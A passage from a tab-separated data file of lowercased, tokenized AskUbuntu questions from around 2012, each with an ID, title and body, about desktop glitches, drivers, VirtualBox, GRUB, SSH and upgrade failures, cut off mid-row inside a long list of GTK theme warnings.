usb 1-6 : gsm modem ( 1-port ) converter now attached to ttyusb4 [ 16638.587114 ] option 1-6:1.5 : gsm modem ( 1-port ) converter detected [ 16638.587187 ] usb 1-6 : gsm modem ( 1-port ) converter now attached to ttyusb5 [ 16638.646686 ] option1 ttyusb5 : gsm modem ( 1-port ) converter now disconnected from ttyusb5 [ 16638.646706 ] option 1-6:1.5 : device disconnected [ 16638.660755 ] scsi15 : usb-storage 1-6:1.5 [ 16638.663284 ] option1 ttyusb4 : gsm modem ( 1-port ) converter now disconnected from ttyusb4 [ 16638.663301 ] option 1-6:1.4 : device disconnected [ 16638.689043 ] scsi16 : usb-storage 1-6:1.4
205140	xfce running but core features not working	suddenly , my xfce4 desktop manager is behaving very weird : the frame around windows for moving or closing them are missing , i can not switch between windows or bring windows in the background by clicking on a different window . this would be the behavior with no desktop manager running , right ? but echo $ desktop_session says xfce and ps ax | grep xfce says : 1755 ? ss 0:00 /bin/sh /etc/xdg/xfce4/xinitrc -- /etc/x11/xinit/xserverrc 1794 ? ss 0:00 /usr/bin/ssh-agent /usr/bin/dbus-launch -- exit-with-session /usr/bin/startxfce4 1797 ? s 0:00 /usr/bin/dbus-launch -- exit-with-session /usr/bin/startxfce4 1806 ? s 0:00 /usr/lib/xfce4/xfconf/xfconfd 1814 ? sl 0:00 xfce4-session 1827 ? sl 0:00 xfce4-panel -- display :0.0 -- sm-client-id 27b5d67b9-b659-4133-8e86-12fee0e6b5a4 1837 ? s 0:00 xfce4-settings-helper -- display :0.0 -- sm-client-id 2764eefc4-8568-487f-87e9-94ca8fc1c661 1903 ? sl 0:00 xfce4-mixer 1906 ? ssl 0:00 xfce4-volumed 2068 ? s 0:00 /usr/lib/xfce4/panel/wrapper /usr/lib/xfce4/panel/plugins/libsystray.so 6 18874424 systray notification area area where notification icons appear 2070 ? sl 0:00 /usr/lib/xfce4-mixer/xfce4/panel-plugins/xfce4-mixer-plugin 15 18874425 xfce4-mixer-plugin mixer volume control for your sound card 2071 ? s 0:01 /usr/lib/orage/xfce4/panel-plugins/xfce4-orageclock-plugin 5 18874426 xfce4-orageclock-plugin orage panel clock show time and date ? so are all processes that xfce4 requires running ? is it just not configures correctly ? in short : what might cause this behavior , and how can i fix this ?
205142	modem manager crashing in 12.10	when i start ubuntu 12.10 , i see the message `` system program problem ... '' modem manager crashes and i ca n't view any web page . i downloaded the latest modem-manager from ubuntu updates , but it also does n't work . any idea ?
205153	make unity run in 3d mode on ubuntu 12.04	my computer , a samsung q330 with a intel® core™ i3 cpu m 380 @ 2.53ghz with 4 gb ram , runs unity in 2d mode . i have tried to see how to activate 3d mode , but i cant figure out how to do it and i am in doubt whether or not my laptop acually has the power to run it in 3d mode . can you help me find out about that ?
205154	virtualbox '/etc/init.d/vboxdrv setup ' issue	i have installed virtualbox through the software centre , but when i try to start a vm , i get the following error : kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . if it is available in your distribution , you should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary . i already updated my dkms and installed linux-headers , but this /etc/init.d/vboxdrv does n't exist . i have been googling but i ca n't find an answer .
205170	what is needed for the authorized-keys in the environments.yaml file ?	i am trying to get juju working in hpcloud ; however , i ca n't figure out what is needed for the authorized-keys in the environment.yml file . i already read this post how can i configure juju for deployment on hp cloud ? and tried creating a public key from the private key from hpcloud management console . in addition , i tried creating the a public key and putting that information inside of the environment.yml file , but the status command is stating `` server refused to accept connection . '' thanks in advance .
205171	how do i change the gtk theme to those found on the page given in the description ?	i 've downloaded some gtk themes from http : //ubuntu-art.org/index.php ? xcontentmode=100 & phpsessid=180c7cef6c965351b9d18e19e3d037e9 and i ca n't see any instructions on how to install them . for additional information i am running ubuntu 12.10 quantal , have ubuntu tweak already installed . thanks for any help !
205173	installing/removing software from the software center does n't work	so , i 'm experiencing the following issue with 12.04 - installing/removing software from the software center does n't work . i find the app i need/do n't need click install/remove and nothing happens . i checked if it 's apt issue , but it is not . there are also no errors with the repositories and no broken packages . i can install/remove packages from `` apt-get '' or synaptic just fine . if this will be of any assistance - starting the software center as root ( with gksu infront ) allows me to install/remove apps .
205179	ssh problem - read from socket failed : connection reset by peer	i can ssh in one direction with no problems : ok -- > ssh user @ computera but the other way , ssh user @ computerb i get read from socket failed : connection reset by peer . i do n't even begin to know where to look to solve this . anyone have any clues ?
205180	ibus-avro is not working in ubuntu 12.10	i was using ibus-avro with ibus input method to write bengali in ubuntu 12.04 . recently i have upgraded ubuntu from 12.04 to 12.10 , now ibus-avro was removed . i have tried to install it again but was getting error message as follows some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : ibus-avro : depends : gir1.2-gjsdbus-1.0 but it is not installable
205181	i ca n't print in the draft mode with my hp deskjet 1660	my printer is a deskjet 1660 and with ubuntu 12.10 i began to use it . the only problem is when i tried to use the draft mode in order to save ink , the job cancels automatically . i do n't know why . i need help . thanks
205184	how to customize the lubuntu menu ? where is the .xml file responsible for it ?	i know that the menu can be modified editing the .xml file responsible for it , but i 've did a research on the web and nothing helped me find this file . so i 'm here asking , how to customize the lubuntu menu ? where is the .xml file responsible for it ? this is the lubuntu menu : ( the image is just to illustrate the question , as i could not find a screenshot of lubuntu 12.10 menu )
205188	always use firefox for web-apps	i am using google chrome ( not chromium , i have my reasons ) as default web browser , but i want to use firefox for ubuntu web apps . is there any way to force web apps to open in firefox and not in default web browser ?
205204	how well will ubuntu run on my compaq presario v2000 laptop ?	i have compaq presario v2000 laptop that have 504mb of ram but i 'm not sure of it 's requirements .
205206	which alternative to using ccsmâ ( compiz config settings manager )	the warning `` what are some of the issues with ccsm and why should i not use it ? '' is referenced in a lot of answers . but no alternative to it is proposed anywhere . what are the alternatives ? in 12.10 , thinks seems to span between gconf and dconf ( and maybe elsewhere ? ) . i was not able to find the real place to set focus follow mouse for example ( metacity gconf option seems to do nothing ) .
205207	windows repairs itself after ubuntu boot	i have a custom built computer in my home which was running windows 7 primarily . after i installed ubuntu 12.04 and upgraded to 12.10 , windows 7 has to perform startup repair after every ubuntu boot up . for example , i am using ubuntu for my everyday work , but when i switch to windows to play one of my steam games , windows fails to boot , and it switches to the recovery partition to `` repair windows '' then boots windows . the whole process takes about 20 minutes , which is quite annoying . anyone know why this is happening or what i can do ? thanks in advance !
205209	ubuntu 11.20 launcher disappeared after installing nvidia driver	yesterday , i have installed and updated nvidia driver from ubuntu software center . after restarting my pc launcher disappeared like in screen : i have restarted , updated and re-installed unity . but it does n't work for me . i think there is problem with graphic/nvidia configuration.with nvidia 520m
205216	installing ubuntu 12.04 along windows 7	i want to installing ubuntu 12.04 along windows 7 and i have 500 gb hard disk and i have already partitioned it to 100 gb as c , 100 gb as d : drive , 100 gb as e drive and remaining as f : drive . so what would be the best course of action to install ubuntu in d : drive ?
205217	i have no extension=* statements in my php.ini yet they load . how ?	how are my php extensions loading if there are no extension=* statements in my php.ini ? does it just automatically load everything in my /conf.d/ directory ? i can even find the path to /conf.d/ specified in php.ini .
205222	white screen for hotot in ubuntu 12.10	i have got a problem when i use hotot on ubuntu 12.10 ( gtk version ) . when i want to authorize hotot to use my twitter account , it displays me a white screen . i an it in a terminal and it displays this mesage when the white screen appears : ** ( hotot:8575 ) : warning ** : binding ' < alt > c ' failed ! so how to solve this problem ? how to do to avoid this white screen ? edit : it seems to be related to this bug : bug # 1019752 `` hotot wo n't start correctly xubuntu 12.10 '' edit 2 : this bug comment explains how to work around the problem .
205224	how do i install python ?	i am new to ubuntu and will be focusing on machine learning . can anyone please provide a step by step guidance for python installation on my system ?
205227	how can i run a program installed from a tar.gz file ?	i 've recently installed ubuntu 12.10 and noticed that whenever i install any type of tar.gz software in the terminal , it says installation finished but i do n't find the software . example : checking dependencies python version : 2.7.3 found pyqt4 found qthelp found qscintilla2 qt version : 4.8.3 pyqt version : 4.9.3 qscintilla version : 2.6.2 all dependencies ok. compiling user interface files ... compiling source files ... installing eric4 ... installation complete . i 've tried installing several tar.gz files but it just does n't appear in my software list even if i search for it the , it just is n't there .
205233	how to convert .tar.gz etc to .deb format using ubucompilator/checkinstall ?	i have some tarballs i want to convert into debian packages . i usually use gdebi to install .debs but tarballs are difficult for me to use . how can i use checkinstall or ubucompilator to make these .deb files ?
205234	how should i determine if a user is logged in graphically while lightdm is running ?	i want to know if someone is logged into a local x-session . in the past i looked at the output of ck-list-sessions . the output looked something like this : session12 : unix-user = ' [ redacted ] ' realname = ' [ redacted ] ' seat = 'seat1' session-type = '' active = true x11-display = ':0' x11-display-device = '/dev/tty8' display-device = '' remote-host-name = '' is-local = true on-since = '2012-10-22t18:17:55.553236z' login-session-id = '4294967295' if no one was logged in , there was no output . i checked if someone was logged in with ck_result '' string = > execresult ( `` /usr/bin/ck-list-sessions | /bin/grep x11 | /usr/bin/cut -- delimiter=\\ ' -f 2 | /usr/bin/wc -w this no longer works , because lightdm greeter looks like a logged in user session12 : unix-user = ' [ redacted ] ' realname = 'light display manager' seat = 'seat1' session-type = 'loginwindow' active = true x11-display = ':0' x11-display-device = '/dev/tty8' display-device = '' remote-host-name = '' is-local = true on-since = '2012-10-22t22:17:55.553236z' login-session-id = '4294967295' i guess i could check session-type , but i do n't know how to do that and check x11-display in one-liner . i then need to write my own script , but at that point i thought i would check if anyone else has already done the work or if there is a way to get consolekit to tell me what i want ( or if i should be using a different tool ) ?
205235	how to use a usb drive on my virtual machine xp when i 'm using ubuntu as the host	i 'm using ubuntu as my host and i 've setup windows xp as my guest os using virtualbox . but the pendrives i insert in my laptop are loaded in the host ubuntu and not in the guest os . how can i solve this problem please help .
205240	how to open encrypted partition , knowing the passphrase ?	i just installed ubuntu 12.04 with the encrypting option . soon after i found that i have lost my windows vista and all my previous partitions as the in the new ubuntu only one hard drive with summation of all previous partitions appears . as i needed my data i tried to recover the partitions . i was successful except for the windows drive ( dev/sda1 ) and that is because it is encrypted . now , i can not even run windows with windows vista recovery cd . any help please .
205242	bootable usb stick created for installation does n't work	i 've downloaded the ubuntu 12.10 iso and followed the instructions on http : //www.ubuntu.com/download/help/create-a-usb-stick-on-windows . after i tried the usb disk i got to the ubuntu live menu , but after choosing run live ubuntu the systems freezes and restarts itself . i 've tried this on a lenovo t61p , an hp pavilion and an acer aspire one ; all the same results .
205243	ca n't see boot loader	when i boot my computer i ca n't see the menu that asks me what os i want to load . my screen is just black and i get an error message on my asus monitor `` out of range . '' so now if i want to retrieve something windows i ca n't because i do n't know where it falls in the list . is there way to fix this or is there a way to have it load windows as default and when i wan na use ubuntu i will just push up a bunch of times and hit enter . specs : ubuntu 12.04.1 lts acer aspire ( desktop ) asus monitor
205245	how to keychain shortcuts in xfce . for example to switch the workspace	in xfce i would like to switch to a particular workplace by pressing two keys after each other . for example first f2 and than the letter a. control-a together is hard to type for me .
205246	creative x-fi hd ( usb sound card )	i connect my sound card to a ubuntu 12.10 machine and it seems to work but , when i try to listen anythings , the sound is corrupted . the device works fine if i connect to a win machine , so i think it is due to a bad driver . could someone tell me how i can fix the problem ? thank you in advance ! bye , emiliano
205248	how do i install legacy drivers for an hd4250 on 12.04 ?	i seen some instructions about workarounds for 12.10 , but i do n't want to risk breaking my system which is something that already happened when i installed the regular fglrx drivers .
205249	how to set up a pptp server on ubuntu ?	i really like to make pptp vpn connection base on ubuntu , ( non-encrypted ) but i do not know how to do this . i think i have to install ppp first but after that my main problem is on configurations .
205250	akonadi and kmail using 100 % cpu	i 've been using kmail for a month or two now and have so far had no problems with it . however , today my laptop died after the battery ran out of power , and since then whenever i log in i see a steady 100 % cpu use from the following processes : akonadi_mailfilter_agent akonadi_imap_resource akonadi_nepomuk_feeder running akonadictl stop kills the processes and returns cpu usage to reasonable levels , but then kmail complains that it can not run without akonadi . can i clear some type of cache or other settings to get kmail back on its feet ?
205252	can not enable additional drivers for broadcom in 12.10	tl ; dr version : additional drivers does not work for enabling a driver in ubuntu 12.10 , however it worked in 12.04 . i upgraded to ubuntu 12.10 from 12.04 via a live usb . i did a fresh install to avoid any conflicts . from 12.04 i know that my wireless card has proprietary drivers that could be installed via additional drivers . i did eventually find additional drivers in the software sources menu , however when i attempt to switch to broadcom 802.11 linux sta wireless driver source from bcmwl-kernel-source , it not only does not work , it in fact disables my wireless completely . the only way to revert this is to restart , and revert back to `` do not use the device '' . then upon another restart , my wireless will function once again . i was curious if anyone else had this issue , and if there was a fix for it as of yet . i looked on launchpad and it may be a potential bug , but i am unsure . any help would be greatly appreciated ( and sorry for that wall of text ) . until then , i 'll continue to use my wireless as it is ( or revert to 12.04 ) , but i do notice a slower connection without it enabled .
205253	ubuntu 12.04 : why my laptop is consuming more power than 11.10 ?	i had 11.10 x86 on my asus laptop ( sandybridge , nvidia 520m ) . i had 8 hours ' battery life with bumblebee and jupiter . average battery discharge rate was around 10w . later i changed , not upgraded , to 12.04.1 amd64 . i installed jupiter . but there is no `` restricted drivers '' available so i guess bumblebee will not work . so i removed nvidia drivers . now i only get 4 hours ' battery life . average battery discharge rate is around 19w . the removal of nvidia driver did not make any difference . what 's the cause ? nvidia video card not disabled or 64b version of ubuntu ?
205256	how can i wake up my pc with any key	my external keyboard does not have a suspend button . is there any way i can set up ubuntu to use a different key ( or any key for that matter ) to wake the pc if it has been suspended .
205259	how to install newest version of texmaker on 12.10	the software repo in quantal has version 3.2.1 of texmaker , but texmaker is now up to version 3.5 . i would like to have version 3.5 . after downloading the .deb from the website ( http : //www.xm1math.net/texmaker/download.html , ubuntu 12.10 amd64 package ) and trying to install it , it complains about wanting libpoppler-qt4-4 . i ca n't find libpoppler-qt4-4 in the repos , only libpoppler-qt4-3 . how can i install texmaxer 3.5 ?
205261	where are the ubuntu-desktop settings ?	i just installed the ubuntu desktop ( apt-get install ubuntu-desktop ) for the first time . i guess this is unity . i wonder where i can find the settings . there was the `` system settings '' tool right in the launcher but it only has some very basic settings - i am missing basically everything . i was searching : how i can change my default mouse cursor how can i setup the background so that it fades through a predefined set ( or just a directory ) of pictures how i can change the default font and other font settings where can i tweak the graphics settings ( this was compiz earlier , not sure if it still is ) etc ...
205263	how to pxe boot with the new unified image in 12.10 ?	how do i setup a `` live cd '' pxe boot with the new ubuntu 12.10 with the unified image ( since netinstall package does not exist ) ? or the instructions here still work ?
205266	why does n't 12.10 give me an option to install beside windows 7 ?	i burned the image to a dvd and i get to the install screen but it does n't ask me about installing beside windows . my only choices are to delete windows and loose everything or `` something else '' . any suggestions ?
205273	how to find out where the `` grub '' is installed	my ubuntu server 12.04 lts asking me during `` apt-get dist-upgrade '' where to install `` grub '' update . so how i can simply found out which partition/disc is the proper answer ? i mean how to found out where grub is currently installed ? i found similar question and answer but how to do it without installing additional script ? i will be grateful for your advice . similar question : how to know the partition where grub is installed cheers : )
205284	where is the sync menu that was going to be integrated with the messaging menu ?	i had heard and read that a common sync menu will b introduced in 12.10 which will be sort of hidden with the messaging menu , and in beta it was ! opening the messaging menu and then pressing the left arrow key would reveal it ... but now its absent ? i had somewhere read it can be brought back but cant remember where i read it ! can anyone help as to how to get the sync menu ?
205290	best practices for strip down ubuntu	especially handons but i like to built a virtual cloud for my labs with minimal resources using ubuntu . i would like to know after a fresh install of ubuntu 12.04 lts what command to total strip down the os ? what step or command to harden the os ? what command to initial to get the stable http / https / ftp / dns server module ?
205291	upgrade to 12.10 fails with grub fatal error	after upgrading to server 12.10 grub is complaining , and thus no boot . boot-repair and all other solution fail because for some reason grub-install can not read /boot/grub from my lvm system disk . i have also tried to reinstall from scratch reusing only my /home dir but the result is the same . surely this ai n't right ...
205294	not detecting a particular wifi network	until yesterday ubuntu was detecting my wifi network well . i had been working with it for about a month . now suddenly it detects all other wireless networks except mine . can you please help me with the solution . thank you in advance
205298	how do i fix the menu items background color in mediterraneannight theme ?	i 'm using the mediterraneannight theme ( http : //gnome-look.org/content/show.php ? content=148398 & forumpage=1 ) and the menu items in some context menus have the wrong background color . for example , when i 'm in eclipse , i select `` project '' and the menu items are light gray and their background color is also light gray . how do i fix this ?
205300	how can i make my own custom desktop widgets ?	a simple solution like html widgets and a transparent webkit window would be ideal . i 'm trying to make a simple background widget framework such that i can easily customize my desktop with some css widgets and not worry about the separate undecorated windows getting moved around like with screenlets on setsid unity . something like this but with pygi is what i 'm looking to find .
205305	graphics errors after 12.10 upgrade	after upgrading to 12.10 64bit , i ran into some issues . originally , i installed ubuntu 10.04 , i installed it in windows , since then have upgraded with each new release via the update manager without any problems . i have a compaq machine with a hard disk partitioned into 3 parts . 12.10 downloaded via update manager , and initial downloading of packages was without problems , however , as it installed the packages , error messages appeared . the first was one about missing lib files , but i clicked to continue it continued , and during the restart process , when it was powering down , the computer hanged on the shutting down bit without rebooting for more than half an hour , so i manually shut down the machine and restarted it . then a new error message appeared stating âcould not find diskâ , and i hit the manual fix option , and it now boots to an empty desktop with no launcher and the graphics appears as if this was put on a 640 x 480 resolution , and the screen no longer fits onto my 19 '' lcd . i had to use ctrl-alt-t to log out and then restart from there . how can i resolve this issue ?
205307	can i open synaptic package manager in a ubuntu live cd session ?	thats the question . i screwed my harddrive and need to repair it in ubuntu live cd session with test disk that i have to install with synaptic package manager , and i don-t know how to open in this live cd session . i cant even enter operative system without the cd . i wanted to copy data first before formatting everything . tell me something ! ! i really need help ! ! thank you
205312	need help to fix hmtl.sty not found error	i installed texlive 2012 on ubuntu 12.04 lts 64 bit machine following the instructions given in the following web how do i install the latest tex live 2012 ? after , a successful installation ( i think ) , i got the following error when i do a pdflatex to compile a give tex file this is pdftex , version 3.1415926-2.4-1.40.13 ( tex live 2012/debian ) restricted \write18 enabled . entering extended mode ( ./user_guide.tex latex2e < 2011/06/27 > babel and hyphenation patterns for english , dumylang , nohyphenation , lo aded . ( /usr/share/texlive/texmf-dist/tex/latex/base/article.cls document class : article 2007/10/19 v1.4h standard latex document class ( /usr/share/texlive/texmf-dist/tex/latex/base/size12.clo ) ) ! latex error : file `html.sty ' not found . type x to quit or to proceed , or enter new name . ( default extension : sty ) so would you help me in getting a solution ? thank you in advance
205323	nautilus bookmarks not showing in `` places ''	i have set some bookmarks from nautilus ( bookmarks / add bookmark ) , and this get showed under bookmarks menu , but does n't show under `` places '' menu . some idea ?
205325	12.04 to 12.10 upgrade failure	in upgrading 12.04 to 12.10 via system upgrade when the system rebooted all i got was my desk-top without any command icons . now all my files are locked into 12.10 and no way to retrieve them . i finally reinstalled 12.04 in a new partition but i do n't have the knowledge on how to access 12.10 from it . being a newbie with linux i feel like i have all thumbs . i 'd like to correct 12.10 but have to idea on what the problem is or how to access it . help ! ! ! video card is a pny geforce 4 mx440 8x on an intel motherboard , so fglrx is not the issue
205327	hdmi sound turns off after screensaver is active	on my dell desktop ( using hd 5700 ) hdmi sound turns off after screensaver is active . hdmi sound works otherwise . it appears to be bug with 12.04 , it was fine with previous ubuntu releases .
205329	how can i stop my email address displaying in the software center comments ?	whenever i leave a comment in usc , my email address is displayed . this is not the case for other commenters . how can i prevent this ? example : https : //apps.ubuntu.com/cat/applications/precise/folder-color/
205337	install batman-adv under ubuntu to start a mesh network	i want to install batman-adv to join a mesh network but i do n't find it in the repository apt-cache search batman-adv is it possible to install it in ubuntu ?
205340	can i make the lock screen image span two monitors ?	i 've got my desktop background spanning two displays , and i want the lock screen to show the same thing . can i set the lock screen to span just like the desktop ?
205342	how do i downgrade to subversion 1.6 ?	i 'm trying to downgrade subversion to 1.6 from 1.7 , doing sudo apt-get install subversion=1.6.17dfsg-3ubuntu3 does not seem to work , any idea on how to do this without breaking half the instalation ? thanks !
205346	upgrade to ubuntu from windows vista	i am trying to upgrade a dell inspiron 1501 from windows vista to ubuntu . i downloaded the appropriate .iso file from the ubuntu site , and used universal_usb-installer to create a bootable usb . however , when i run wubi.exe and take the help me to boot from cd option , i get the following : 10-22 23:25 debug tasklist : # # # finished check_iso 10-22 23:25 debug tasklist : # # finished use_cd 10-22 23:25 debug tasklist : # # running extract_kernel ... 10-22 23:25 error tasklist : could not retrieve the required installation files traceback ( most recent call last ) : file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 618 , in extract_kernel exception : could not retrieve the required installation files 10-22 23:25 debug tasklist : # cancelling tasklist 10-22 23:25 error root : could not retrieve the required installation files traceback ( most recent call last ) : file `` \lib\wubi\application.py '' , line 58 , in run file `` \lib\wubi\application.py '' , line 130 , in select_task file `` \lib\wubi\application.py '' , line 205 , in run_cd_menu file `` \lib\wubi\application.py '' , line 122 , in select_task file `` \lib\wubi\application.py '' , line 228 , in run_cd_boot file `` \lib\wubi\backends\common\tasklist.py '' , line 197 , in __call__ file `` \lib\wubi\backends\common\backend.py '' , line 618 , in extract_kernel exception : could not retrieve the required installation files 10-22 23:25 debug tasklist : # finished tasklist can you help please ? thanks , willie
205349	a lot of `gtk-warnings` in terminal . is this serious ?	i had a lot of problems with my system and had to reinstall it . one of them was these very messages . after reinstalling the system and using the same icons , i get the warnings again and am wary of future problems . how risky is this and should i remove the icons-theme ? ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:553:10 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:553:12 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:553:14 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:553:16 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:574:10 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:584:11 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:588:16 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:589:17 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:601:13 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:602:16 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:648:20 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:649:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:661:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:692:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:694:20 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:746:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:747:20 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:794:20 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:795:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:943:15 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:945:20 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:967:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:968:20 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1032:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1032:23 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1045:20 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1177:20 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1222:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1223:14 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1223:16 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1223:18 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1223:20 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1229:24 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1229:26 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1230:21 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1230:23 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1230:25 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1239:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1239:23 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1239:25 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1240:14 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1264:20 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1264:26 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1270:22 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1270:24 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gtk-widgets.css:1271:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gnome-panel.css:8:10 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gnome-panel.css:23:20 : '' is not a valid color name ( gedit:637 ) : gtk-warning ** : theme parsing error : gnome-terminal.css:23:20 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : gnome-terminal.css:56:1 : expected a valid selector ( gedit:637 ) : gtk-warning ** : theme parsing error : unity.css:11:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : unity.css:21:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : unity.css:21:21 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : unity.css:21:25 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : nautilus.css:11:20 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : nautilus.css:32:16 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : nautilus.css:64:20 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : nautilus.css:64:22 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : nautilus.css:65:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-dark.css:5:14 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-dark.css:10:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-dark.css:33:10 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-dark.css:33:12 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-dark.css:61:23 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-dark.css:127:22 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-dark.css:161:20 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-dark.css:163:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-dark.css:178:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-darker.css:5:14 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-darker.css:10:19 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-darker.css:33:10 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-darker.css:33:12 : not using units is deprecated . assuming 'px ' . ( gedit:637 ) : gtk-warning ** : theme parsing error : menus-darker.css:66:23 : not using units is deprecated . assuming 